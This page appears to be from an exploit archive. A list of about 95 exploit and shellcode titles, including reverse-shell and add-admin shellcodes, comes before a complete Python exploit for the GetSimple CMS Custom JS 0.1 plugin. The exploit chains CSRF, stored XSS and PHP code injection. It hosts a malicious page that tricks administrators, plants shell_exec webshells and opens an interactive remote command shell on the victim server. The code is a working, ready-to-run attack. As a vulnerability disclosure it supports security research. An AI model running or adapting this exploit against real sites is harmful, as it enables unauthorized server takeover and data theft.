de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
166 lines
No EOL
7.9 KiB
Python
Executable file
166 lines
No EOL
7.9 KiB
Python
Executable file
# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
|
|
# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
|
|
# Date: 30/04/201
|
|
# Vendor Homepage: http://get-simple.info
|
|
# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
|
|
# Vendor: 4Enzo
|
|
# Version: v0.1
|
|
# Tested against Server Host: Windows 10 Pro + XAMPP
|
|
# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
|
|
# Vulnerability Description:
|
|
# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.
|
|
# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
|
|
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
# CVSS Base Score: 9.6
|
|
|
|
import argparse,requests
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
|
from colorama import (Fore as F, Back as B, Style as S)
|
|
from threading import Thread
|
|
from time import sleep
|
|
|
|
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
|
|
def bullet(char,color):
|
|
C=FB if color == 'B' else FR if color == 'R' else FG
|
|
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
|
|
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
|
|
|
|
class theTHREADER(object):
|
|
def __init__(self, interval=1):
|
|
self.interval = interval
|
|
thread = Thread(target=self.run, args=())
|
|
thread.daemon = True
|
|
thread.start()
|
|
def run(self):
|
|
run()
|
|
|
|
def webshell(target):
|
|
try:
|
|
websh = "{}/webshell.php".format(target,page)
|
|
term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST)
|
|
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
|
|
print(welcome)
|
|
while True:
|
|
specialmove = input(term)
|
|
command = {'FierceGodKick': specialmove}
|
|
r = requests.post(websh, data=command, verify=False)
|
|
status = r.status_code
|
|
if status != 200:
|
|
r.raise_for_status()
|
|
response = r.text
|
|
print(response)
|
|
except:
|
|
pass
|
|
|
|
|
|
def xhrRcePayload():
|
|
payload = 'var e=function(i){return encodeURIComponent(i);};'
|
|
payload += 'var gt = decodeURIComponent("%3c");'
|
|
payload += 'var lt = decodeURIComponent("%3e");'
|
|
payload += 'var h="application/x-www-form-urlencoded";'
|
|
payload += 'var u="/admin/theme-edit.php";'
|
|
payload += 'var xhr1=new XMLHttpRequest();'
|
|
payload += 'var xhr2=new XMLHttpRequest();'
|
|
payload += 'xhr1.onreadystatechange=function(){'
|
|
payload += 'if(xhr1.readyState==4 && xhr1.status==200){'
|
|
payload += 'r=this.responseXML;'
|
|
payload += 'nVal=r.querySelector("#nonce").value;'
|
|
payload += 'eVal=r.forms[1][2].defaultValue;'
|
|
payload += 'xhr2.open("POST",u,true);'
|
|
payload += 'xhr2.setRequestHeader("Content-Type",h);'
|
|
payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);'
|
|
payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
|
|
payload += 'xhr2.send(params);'
|
|
payload += '}};'
|
|
payload += 'xhr1.open("GET",u,true);'
|
|
payload += 'xhr1.responseType="document";'
|
|
payload += 'xhr1.send();'
|
|
return payload
|
|
|
|
def csrfPayload():
|
|
payload = '<html><body>'
|
|
payload += '<form action="'+target+'/admin/load.php?id=CustomJSPlugin" method="POST">'
|
|
payload += '<input type="hidden" name="customjs_url_content" value="">'
|
|
payload += '<input type="hidden" name="customjs_js_content" value="'+xhrRcePayload()+'">'
|
|
payload += '<input type="hidden" name="submit" value="Save Settings">'
|
|
payload += '<input type="submit" value="Submit request">'
|
|
payload += '</form></body></html>'
|
|
return payload
|
|
|
|
class S(BaseHTTPRequestHandler):
|
|
def do_GET(self):
|
|
victim = self.client_address
|
|
victim = "{}:{}".format(victim[0],victim[1])
|
|
print("{}{} connected to Malicious CSRF Site!".format(ok,victim))
|
|
print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
|
|
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
|
|
|
|
def run(server_class=HTTPServer, handler_class=S, port=80):
|
|
server_address = ('', port)
|
|
httpd = server_class(server_address, handler_class)
|
|
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
|
|
try:
|
|
httpd.serve_forever()
|
|
except KeyboardInterrupt:
|
|
pass
|
|
httpd.server_close()
|
|
print('Stopping httpd...')
|
|
|
|
def tryUploadWebshell(target,page):
|
|
try:
|
|
blind = target+page
|
|
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
|
|
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
|
|
requests.post(url=blind, data=webshUpload, verify=False)
|
|
except:
|
|
pass
|
|
|
|
def checkWebshell(target):
|
|
try:
|
|
websh = "{}/webshell.php".format(target)
|
|
capsule = {'FierceGodKick':'pwnt?'}
|
|
resp = requests.post(url=websh, data=capsule, verify=False)
|
|
return resp.status_code
|
|
except:
|
|
pass
|
|
|
|
def sig():
|
|
SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
|
|
SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
|
|
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
|
|
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n"
|
|
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
|
|
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
|
|
SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
|
|
return SIG
|
|
|
|
def argsetup():
|
|
about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
|
|
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
|
|
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
|
|
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
|
|
parser.add_argument('Target',type=str,help=desc1)
|
|
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
|
|
parser.add_argument('PublicPage',type=str,help=desc2)
|
|
args = parser.parse_args()
|
|
return args
|
|
|
|
if __name__ == '__main__':
|
|
header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n'
|
|
header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST
|
|
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST
|
|
print(header)
|
|
args = argsetup()
|
|
target = args.Target
|
|
page = args.PublicPage
|
|
print(sig())
|
|
theTHREADER()
|
|
pwnt = checkWebshell(target)
|
|
if pwnt != 200:
|
|
while pwnt != 200:
|
|
sleep(3)
|
|
tryUploadWebshell(target,page)
|
|
sleep(2)
|
|
pwnt = checkWebshell(target)
|
|
print("{} A wild webshell appears!".format(ok))
|
|
webshell(target) |